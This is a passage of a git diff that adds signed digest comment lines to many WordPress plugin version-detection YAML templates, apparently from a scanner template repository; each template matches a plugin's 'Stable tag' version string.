a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 69c367b8d5..374bc3659c 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200709c1a7bcd0b7ee36434ed70d680d4bedcbcd1d8328fc90636365eec1a71938022060c63cba48aae720b76a78a8cf3a462d30be0a07b8c78237a01e1e7789cd4423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 7776b209df..57d3998512 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053054701a9cba5b82343638e670389cedd204edaf98adcdb7883849a4e6277120220290be4713c8845d2dbc3c4259c5ea4274739d49f20580f7be8e0da9d3bb0789a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..d14e0c5229 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205dc101d5d7bcdd4fe72b1c438bfa49d8aa5e39d03474859d28d9027cb5438dc8022064955aaa3f6f80195935d871b3909047e7ed5160941634dfe068c91af7e3c630:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..15e4a110a6 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220792b56d26c4eb54d9990c0530ad2bb570624f58feba85fa815f21a673e8d5fc0022035756b46f0a03afc928d3e2ff95148bed7bad2d96e230c2709897b14608700d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..01cacc8be3 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e26c682bb0cd4577525009a15e34b635239562b40402613f3f1deef053a50cff0220655ae08e8ba975bda1a8ef842cc0f296427b0c713cd6aebbbae6d8c1e17ea46e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..031222c1ce 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ee3dffc0fe89987e0b8fabc0c9a28540a845dfd723c9fe0fc7511c11928171102200e025d0887c2283da867b0165d301340e81e5a3c78fcf3b3432056c734a234bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..757042bf8c 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023b64c49289a3783d7544de10aa1ae06d02c7ba8e3a37310b26818cbe0586759022100ed6d170466df1344664faca9c42b34544550e4ed3adafd1fb19a92ebd13abb36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..a181ef0dd3 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e24132c5fc464dff396fa959b3dee4db4fc86bbac0bef657f0fbc717abb92ca00220036dad75bce505270bdab634f41214737fede2c9c6b34283c90dcbe1f72fa918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 9d77ce9155..ceac870b91 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084b76e2ada6a7b1cacbd59be54630869ad289a861c2285978a24c3c4bf5a8d03022061f463933927654fa13e3de021d32c5d25d71162f377dd68642f436270c1aacb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..4755a7e85c 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220205848229075e0c750550406f315e6f495b6c4495cf889d5083963813c72f50802200448a2902546393ab68805fcf8603f17af77292407b9122aa25d455ca54f63d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..0a8a7d13ca 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078f238de913c037ca83098c12988b9fcf6b1f8fc7c135934836fce4e40fa150c02200ee73b70b2436be4abe8632dd57de3f6c0e25de7a38c064810828b60bf346649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..045b76d6e8 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f3af5b7d7b6854548ec355188286d7df58bd893d1eebc0643f1e405fad33fe9022100bb9801207804279068c9e9154ee50dd6a39735c249592151bcd509455359f64b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 34d36d4349..6c110fc9e9 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ddc055a6a3e83e74b547d439e33d75ee2111e3fb464a4d013cae6fe534a112bf02202fb7481111804925e874eb9c14ece52f9cbd335328612e9266b4405dc6b1a1e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..51071c9517 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204ba741ffaf9de05e1661562e2bf7e6dd2bcb5a5b86e9bea7c76350ab9baca822022100b0b175a51822462907e145460ffed3d0d7b80af957b14140fd4438ff0bef8e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 39b176dcb8..20af30a857 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0ad1f462287ba0b61d016390dcd1db953f6af7e2ebc991f010e01017bc23f8d022100fff392bae252ab18a605073cd33c61cce022d1977201280aabc0e81335d35306:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..7d4aa5f09b 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dbe0632e111132dc56a1e3d0e63c3bac51329e692f723ff48e76ff92b249a693022061e78cddd016ac39c290274884960c8de7704a2eb73edd9641add5312d50cc64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..cc8db87d33 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204bf3105712d62ea325ac908d4ea70d1cca1f43fd1fae766ba5e330a2a50b5cc2022030ddc6beec61260a1c3b066079dc48b4f114e3b5b6fe0b6a80feeffdddbb8bbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..7db239a3a3 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c7724af344ef313dfd853c0add53de47d64a110257ef26aa904b77d7ed4eb28022100fca180f3f3bfc96dcfb36a18ee0b10f09d495dde05f5b330aa3287a38420e876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..1388ec0a24 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ea8305e2f8088bf2eb2616d410dd2a07b0bbcf0d92e4af0fcda61ac0d84a88f0220302a87a9995f3f093f417e007359406a1f9694a48c7ea1f1ffbd7c5bbf5255da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..8e1b5b8395 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207828d25da3b662d2bdd001c5c6eab7f2228161510ef9a8c2c0fadd33446c8c95022100c151f440c3f8955b9df57c37ef535bcbb2c08009c99e7ce2682b396a0e46b767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..ad8fca8c58 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220458f3d74acf8569f5ea62ebad483731c84881ec224a61bbf10c3f37dca745bad022100d7b640b481483478635798ebbd4651d1db37171c5a270e7aad7fee420631cba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..b9fa856a93 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fccf514ace8f19f8618279877c712074b727378e03ee7ede3e9d7344386c8ec902207b0a716d7e832938fd63b12ce75442c0d9820a8c30addf76b9ac02bcf5159b05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..d07f0b0f10 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220683c6d327b0e76286c2322c75799ad179566d2db89dcd06b177c23df9ef2c5cc022100d4be071ce8f163412bae30785c9813895496d68f999c1a9dc815fbbbef873800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..489709e071 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c75945762e90ce4cc198090d5706fef2c6bca1c1f92fab06e8cdf03079c7a02b022100a101f795d6684f236c1151d557fc9442ede1adad5823582f46e4106a7e9ac21e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a4c9f2c7c4..e1cfae6643 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e784f4c0b94bd9bf06dbf21909972d647a9d5d39c4ffbbc251ee7da6cc4fbde8022100c40478d6cdc84c02bcbcca373a9b12b92354aec506432827510e58a0794dd045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1fd49d2e08..01ac550264 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c81a6a4041c6f52c8e7b242f2d2b3bc29740c8b96169fb1778d6f725e59441e8022029601dc7c2337fa64f9ec740d1a5eca167e95586317ece802d6de4155aaa2ac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..719f115a98 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e3f47b79e5e8457715f49c6c19d886b167e34f57fd417a60041bcfbb89289c7e022100ff46c42d6f7c2903bb7ad045679bbb9f85683ade013aaf37c6f3bed431e39286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..51803727e9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a3d69456b281b4766bc6e89be287f21d09fa4067a45ac82d797869270150297d022013b80e4c84aad9c7dedb9c3ea7e3d35dc6a9f568eda44a8c4568c490a5d11051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..f328671fd1 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f76a8c7d7cddd9079d6c33fbfd7890330c351064287ab935efa82e6ec45df49502202cfbf6a14e8da9c427713c7c46618ab9df8c5767b25fe2c824223c30ce315b46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..4fe54a9159 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aabe829f1c793abc7048cd7fd9bb60d4af711c803c60e576e5d7fec9cbf42c4a022100ce37827bafd43d16e9ba82530d030bb6a853a38d723d764dc48757a11b274b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..3998a1448c 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cce31871944c2a09a42e933d8f17c1153fb9b529008306e1888ec5f4d7fe74f902202b6e15fd9c416fb9b86220c5c875eaf56e3f447d96a7d45bb36991d2a24b68c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..218d32931b 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa2a7f20bf684665c59ccd5d2dd309421cabf4bb89aa3a35b2f7d58510f5c3300220425779d68820f2cc71340ac43c1480f7c43fc7064abf0fac464c3fa2f79d5299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..dd5789f9b6 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c797e771d78c8ddbd5b86430222831f65b95379c880434bbe23463420dab442002210087fd0452f79130e3ce3f8c5dc4acbd88f2f6403bbe8e6a695ce02f2244412605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..4b03f9cf12 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f708730adf06bd9482f68ce7b7b2dfc5b04d1e308f3c38cbbb5e352ccdd68ebd02202974cc90403343e46c15fb2eef06584ee13403e0a93c05675f805ea1c144ab27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..63ec3c022c 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a2e5dba6155faae0d6d3fa14d6353c7d02b2f07054c84fd3aa252ff92bace472022100f4f32d5de16ba3d373ae89eb4a2ef49176b1c95ee3e8feb324df558877aaa697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..8d2f32573c 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008186f4b48015b1e59dbac92f26205f27376a882ffb0b8d04d5a2e476f411518c022100ad1e34b664a31945079853d77245ab5d0c507264859420562941cecd4f156979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..c8357733e0 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e29486bfb823d538bd1179eb54c61fb9b29c46f2034a78358617c36488b27090220359a3eae0eed9b235a0dbf3eece7ec4b3828e4e1bb73925f62b389ad08d7f384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..610aebb25e 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202ffef42df7f37c967c59bec36ffb83a430ea63d1dced5babb1a3d63c9c1ef10f022100d9f0fd23493179b2804095af2ca4814b863edb74218d0800e2f4d3490376102a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..b04b9dac0d 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e5ab215c834a30e1e3cbfffe9276bc4b46fc4346e2e8e091fa074d04ae56800022100f0f3583f479d144d77deed592e00015e2297957ea689816ac4013f2888a2aa0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..424331e692 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100af0052e23254ca9f0d1eaf1b9a30f79926b861d83d01e3a07513b536624e4c55022100c1d625ef985026ad26f14dd8a401ed007820cfe8970144c7d60602f536ea20dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..785c074593 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f013742203999f39e5fddc6c61535674a00eb805d263e47425c3de330f32dae02210088eb790c5b73c06a610df191d379f7580ba36c249dee4e5e22da5953544efe21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 34115bcd0f..f35ea85642 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057ea6155212f2c53b6456a4ca8c1c16115f95661ff53a26e831dde6709c5608b02207c218c64d8ece5a6b2f7afb748fcbd3aedbd5318861122249be076921bfad4b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..0f54411484 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df4a0ce9e053c04794a5ef290e7b9b439b90db70255acabc275e9fc2d4c53bd102207d2b885e18b1e8147db9a5ab30dbc86445b9f4e090c9a88c60273b9e61995840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..ba59650889 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d5a14dad781a31b4d17f757d96634a22419d93fc8ad7e5be47ce106e01be05002210084d7c01061afecf73d48fa33ce2c91b143d24bd6c7807e3efd89ac1b33fc3f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..1162e2ecc1 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e41e3d6d390dd74a8b2302a9c516babe93a4fcb1cbfaf8d62e0955a9a9967ce02201b15617ace8ab1f4b9b89cc45767bc7a200d11c2916a542a68e33fd7cdfc7fff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c3ec4ebd80..7ac9bf5310 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220109c2787153f6fde41753e83870d23f8928a932f49ad3616183ccf7bae61be660221008254147766a25385b2cf16ac472d3102e1a87f69d71c25f01efa77c26e32904b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..f45940044f 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,3 +47,4 